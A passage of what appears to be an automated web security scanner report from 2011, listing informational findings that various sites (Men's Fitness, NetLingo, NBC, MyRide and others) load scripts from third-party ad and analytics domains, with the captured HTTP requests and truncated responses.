Set-Cookie: PHPSESSID=3497fb0606bae927d83d82e254f5c56a; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<meta id="syntaxhighlighteranchor" name="syntaxhighlighter-version" content="3.1.1" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1117. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mensfitness.com
Path:   /Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://js.adsonar.com/js/adsonar.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js
  • http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://secure-us.imrworldwide.com/v53.js
  • http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /Tshirt_Workout/fitness/ab_exercises/136 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:52 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 1
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:44:50 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45331

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>


<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- Begin Crazy Egg -->
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

21.1118. http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mensfitness.com
Path:   /sports_and_recreation/outdoor_recreation/55

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://js.adsonar.com/js/adsonar.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js
  • http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://secure-us.imrworldwide.com/v53.js
  • http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /sports_and_recreation/outdoor_recreation/55 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43200
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:44:47 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 39408

<html>
<head>

<title>Tri This - Men's Fitness</title>


<meta name="Description" content="There's no better way to test your summer fitness than competing in a triathlon.">


<meta name="Keywords" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- Begin Crazy Egg -->
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

21.1119. http://www.metacafe.com/fplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://s.mcstatic.com/JS/Externals/?v=7879
  • http://s1.mcstatic.com/JS/Home/?v=7879
  • http://s4.mcstatic.com/JS/Global/?v=7879

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Global/?v=7879" /><script type="text/javascript" src="http://s4.mcstatic.com/JS/Global/?v=7879"></script><link type="text/css" rel="stylesheet" href="http://s1.mcstatic.com/CSS/Home/?v=7879" /><script type="text/javascript" src="http://s1.mcstatic.com/JS/Home/?v=7879"></script>
...[SNIP]...
<!-- external JS for GA, Omniture and quantcase -->
       <script type="text/javascript" src="http://s.mcstatic.com/JS/Externals/?v=7879"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1120. http://www.mindbodygreen.com/passvote.action

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindbodygreen.com
Path:   /passvote.action

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1
  • http://www.google-analytics.com/urchin.js

Request

GET /passvote.action HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Date: Tue, 25 Jan 2011 04:45:36 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<link rel="Shortcut Icon" href="/favicon.ico;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<script src="http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1" type="text/javascript"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1121. http://www.mister-wong.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/
  • http://static.mister-wong.de/mootools-1.2-core-more.js

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:30 GMT
Server: Apache
Set-Cookie: wongsess=847df68c6b6a1522859025303610eb1c; expires=Fri, 25 Jan 2036 10:46:31 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7516
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<link href="/ccss/default.css,buddys.css,dropdown.css,users.css,autocompleter.css,spotlight.css,remooz.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://static.mister-wong.de/mootools-1.2-core-more.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
                       <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/" type="text/javascript"></script>
...[SNIP]...

21.1122. http://www.munit.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.munit.co.uk
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
  • http://s16.sitemeter.com/js/counter.js?site=s16mlogix

Request

GET / HTTP/1.1
Host: www.munit.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:15 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 4487


       <html>
       <head>
           <title>mLogix : Web Application Development in Orlando, FL | Welcome</title>
           
                   <script type="text/javascript">
        var _kmq = _kmq || [];
        function _kms(u){
           setTimeo
...[SNIP]...
<link rel="stylesheet"type="text/css" href="/includes/nav.css" media="screen" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<!-- Site Meter -->
                   <script type="text/javascript" src="http://s16.sitemeter.com/js/counter.js?site=s16mlogix">
                   </script>
...[SNIP]...

21.1123. http://www.myride.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myride.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?
  • http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=27821;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=003&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:08:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Set-Cookie: USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
Set-Cookie: COUNT=1;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ID=27821%3BRIDE;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/
Content-Length: 42720

<!-- CWEB429 --><!-- www -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   
       <title>New Cars | Used Cars for Sale | New and Used Car Prices | MyRide.com</title>
...[SNIP]...
u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?" name="frame1" width="160" height="185" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=27821;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?">
   </script>
...[SNIP]...
C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?">
               </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=003&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.1124. http://www.myspace.com/netlingo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /netlingo

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cms.myspacecdn.com/cms/js/ad_wrapper0163.js
  • http://js.myspacecdn.com/modules/common/static/js/atlas/msglobal_hbblzuck.js

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Server: 53fa252345a87b39ff47aafb4ed7b2849b482ff947909977
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
Set-Cookie: SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Tue, 25 Jan 2011 04:46:51 GMT
Content-Length: 29349
X-Vertical: profileidentities


<!DOCTYPE html>
<html class="noJS en-US">
   <!-- UserViewProfile -->
<head><meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>
   NetLingo on Myspace
</title>
       <script type="text/ja
...[SNIP]...
</script><script type="text/javascript" src="http://js.myspacecdn.com/modules/common/static/js/atlas/msglobal_hbblzuck.js"></script>
<script type="text/javascript" src="http://cms.myspacecdn.com/cms/js/ad_wrapper0163.js"></script>
...[SNIP]...

21.1125. http://www.nbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js?pub=nbcunbc2
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
  • http://www.nbcudigitaladops.com/hosted/global.js

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Wirt: qw-p-web17.qwplatform.com
Content-Type: text/html
Cache-Control: max-age=40
Expires: Tue, 25 Jan 2011 04:47:46 GMT
Date: Tue, 25 Jan 2011 04:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-true=no; expires=Wed, 26-Jan-2011 04:47:06 GMT; path=/
Vary: User-Agent
Content-Length: 131845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=nbcunbc2"></script>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
<!-- nbc container -->

<script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1126. http://www.netlingo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET / HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 46406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1127. http://www.netlingo.com/acronyms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /acronyms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 229925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1128. http://www.netlingo.com/add-edit/editor-guidelines.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /add-edit/editor-guidelines.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /add-edit/editor-guidelines.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1129. http://www.netlingo.com/add.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /add.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /add.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<!-- /header --> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1130. http://www.netlingo.com/advertise/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1131. http://www.netlingo.com/advertise/licensing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/licensing.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/licensing.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1132. http://www.netlingo.com/advertise/payments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/payments.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/payments.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1133. http://www.netlingo.com/advertise/sponsorships.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/sponsorships.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/sponsorships.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
